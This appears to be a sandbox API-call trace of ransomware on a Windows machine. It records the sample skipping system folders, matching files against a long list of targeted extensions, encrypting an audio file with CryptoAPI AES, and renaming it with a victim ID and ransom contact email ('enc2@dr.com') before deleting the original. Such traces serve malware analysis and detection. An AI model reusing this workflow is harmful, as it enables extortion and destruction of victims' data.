	[0183.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="application data") returned 0x0
	[0183.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="winnt") returned 0x0
	[0183.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="tmp") returned 0x0
	[0183.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.752] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="cache") returned 0x0
	[0183.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.752] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.752] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="webcache") returned 0x0
	[0183.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.752] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="inetcache") returned 0x0
	[0183.752] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="nvidia") returned 0x0
	[0183.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="packages") returned 0x0
	[0183.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="cookies") returned 0x0
	[0183.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="programdata") returned 0x0
	[0183.753] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0xa14c0, ftLastAccessTime.dwHighDateTime=0x1d97332, ftLastWriteTime.dwLowDateTime=0xa14c0, ftLastWriteTime.dwHighDateTime=0x1d97332, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.754] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1795fc0, ftCreationTime.dwHighDateTime=0x1d97024, ftLastAccessTime.dwLowDateTime=0xc6cfad20, ftLastAccessTime.dwHighDateTime=0x1d9732a, ftLastWriteTime.dwLowDateTime=0xc6cfad20, ftLastWriteTime.dwHighDateTime=0x1d9732a, nFileSizeHigh=0x0, nFileSizeLow=0x99ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="exmPmPcf6ejOq9s cdj.m4a", cAlternateFileName="EXMPMP~1.M4A")) returned 1
	[0183.754] lstrcmpW (lpString1="exmPmPcf6ejOq9s cdj.m4a", lpString2="..") returned 1
	[0183.754] lstrcmpW (lpString1="exmPmPcf6ejOq9s cdj.m4a", lpString2=".") returned 1
	[0183.754] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.754] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\", lpString2="exmPmPcf6ejOq9s cdj.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\exmPmPcf6ejOq9s cdj.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\exmPmPcf6ejOq9s cdj.m4a"
	[0183.754] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\exmPmPcf6ejOq9s cdj.m4a") returned 66
	[0183.754] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.755] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\exmPmPcf6ejOq9s cdj.m4a", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a") returned 0x42
	[0183.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.755] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.755] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a") returned="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a"
	[0183.755] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a") returned 66
	[0183.755] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.756] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0183.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.756] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.756] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.756] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.756] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.760] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x99ac, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x99ac, lpOverlapped=0x0) returned 1
	[0183.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.765] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcabc0) returned 1
	[0183.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.768] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.768] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.768] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9530) returned 1
	[0183.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.768] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x99ac, dwBufLen=0x99ac | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x99b0) returned 1
	[0183.770] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.770] RtlMoveMemory (in: Destination=0xfe6b38, Source=0xfdd180, Length=0x99ac | out: Destination=0xfe6b38) 
	[0183.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.770] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6b38*, pdwDataLen=0x18aefc*=0x99ac, dwBufLen=0x99b0 | out: pbData=0xfe6b38*, pdwDataLen=0x18aefc*=0x99b0) returned 1
	[0183.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.771] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0183.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.771] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0183.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.772] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0183.772] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.772] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.773] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.774] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 108
	[0183.774] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.776] WriteFile (in: hFile=0x390, lpBuffer=0xfe6b38*, nNumberOfBytesToWrite=0x99b0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe6b38*, lpNumberOfBytesWritten=0x18b358*=0x99b0, lpOverlapped=0x0) returned 1
	[0183.781] CloseHandle (hObject=0x390) returned 1
	[0183.782] CloseHandle (hObject=0x388) returned 1
	[0183.782] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a")) returned 1
	[0183.818] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\exmpmpcf6ejoq9s cdj.m4a")) returned 0
	[0183.818] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15fa3db0, ftCreationTime.dwHighDateTime=0x1d96ea9, ftLastAccessTime.dwLowDateTime=0x38a12740, ftLastAccessTime.dwHighDateTime=0x1d96fa6, ftLastWriteTime.dwLowDateTime=0x38a12740, ftLastWriteTime.dwHighDateTime=0x1d96fa6, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FWbkN_RDsIvw.doc", cAlternateFileName="FWBKN_~1.DOC")) returned 1
